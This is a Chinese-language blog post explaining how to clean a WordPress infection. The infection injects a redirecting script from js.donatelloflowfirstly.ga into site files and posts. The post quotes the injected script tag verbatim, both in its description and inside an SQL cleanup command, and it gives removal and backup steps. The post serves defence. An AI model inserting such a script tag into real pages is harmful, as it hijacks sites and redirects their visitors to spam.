清理Wordpress新病毒js. donatelloflowfirstly. ga

近期有很多Wordpress站点被未知漏洞入侵，并在网站文件， 日志内容等页面里插入一段JS跳转代码，代码来源域名：js. donatelloflowfirstly. ga。黑客利用未知后门/漏洞在站点根目录下载/生成一个木马文件，并利用该文件进行全站扫描，并在所有index, head, js 等文件头部插入JS代码，而且还会进行数据库操作，将该代码插入到所有的日志及文章底部，代码如下：

<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript’></script>

 

该代码会将整个网站随机跳转至几个垃圾站，如上图所示

尚未知该后门具体来源，wordpress社区也没有很好的修补方案，但是极有可能是因为安装了破解版的模板或插件，导致黑客有机可趁。所以你的网站如果被感染了，目前能做的就是手工清理，然后进行备份。

 

以下为清理方法：

参考文章：https://www.waikey.com/vps-tutorials/remove-js-donatelloflowfirstly-ga/

 

1：删除病毒文件
查看网站根目录，寻找病毒文件。文件名基本为 “_a” 或者 “_t”，删除之。当然如果你有兴趣，可以下载下来研究一下。没有后缀名，但是可以用编辑器打开。

 

2：清理数据库
你可以登录Phpmyadmin运行SQL命令，或者你可以直接SSH里运行MYSQL命令，选择合适自己的方式，运行以下命令：

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src=’https://js.donatelloflowfirstly.ga/stat.js?n=ns1' type=’text/javascript’></script>”, ‘’));

该命令即清理日志里被插入的代码，注意里面的单双引号。

 

3: 清理被感染文件
我用的方法比较粗暴，如果你对模板或者插件有一些比较重要的修改，建议跳过到第4步进行操作。

1. 打包下载全站文件，并解压到桌面。
2. 删除所有模板及插件，基本都被干扰了，直接替换成干净原版的插件和模板。
3. 删除所有Cached缓存文件，因为很多缓存都被感染了。缓存文件一般在Wp-content文件夹里。
4. 安装并打开Vscode编辑器，或者类似的编辑器，并打开该文件夹。选择 编辑>文件内搜索 功能，搜索关键词：donatelloflowfirstly。
5. 清理（编辑或者直接替换）找到的文件即可。

至此，文件基本清理完成。重新打包，上传到网站目录进行替换即可。

 

P.S. 清理过程中可能会遇到的情况

如果你是自己的VPS，安装了Memcached等缓存功能，建议先停止该功能。如果是宝塔面板很好操作，直接在已安装软件里停止即可。如果你是纯LNMP类的环境，请自行解决，因为我不知道怎么弄。

当然，如果你开启了CDN， 也建议关闭，等所有的清理干净后再恢复即可。

 

4：备份，再备份
确认一切都没问题了后，如果后台有缓存插件之类的，刷新一下缓存，CDN什么的缓存都清理一遍。然后开始备份吧。把网站和数据库都备份一遍，然后这段时间如果发了新文章，或者做了新的修改，都建议备份一次，防止再次被感染！

总结

 

如上面所说，目前还不知道后门具体来源自哪里，但极有可能是因为安装了破解版的插件或者模板。所以，如果有可能，而且这些插件模板必须要的情况下，就买官方正版吧！

最后再次提醒，勤备份！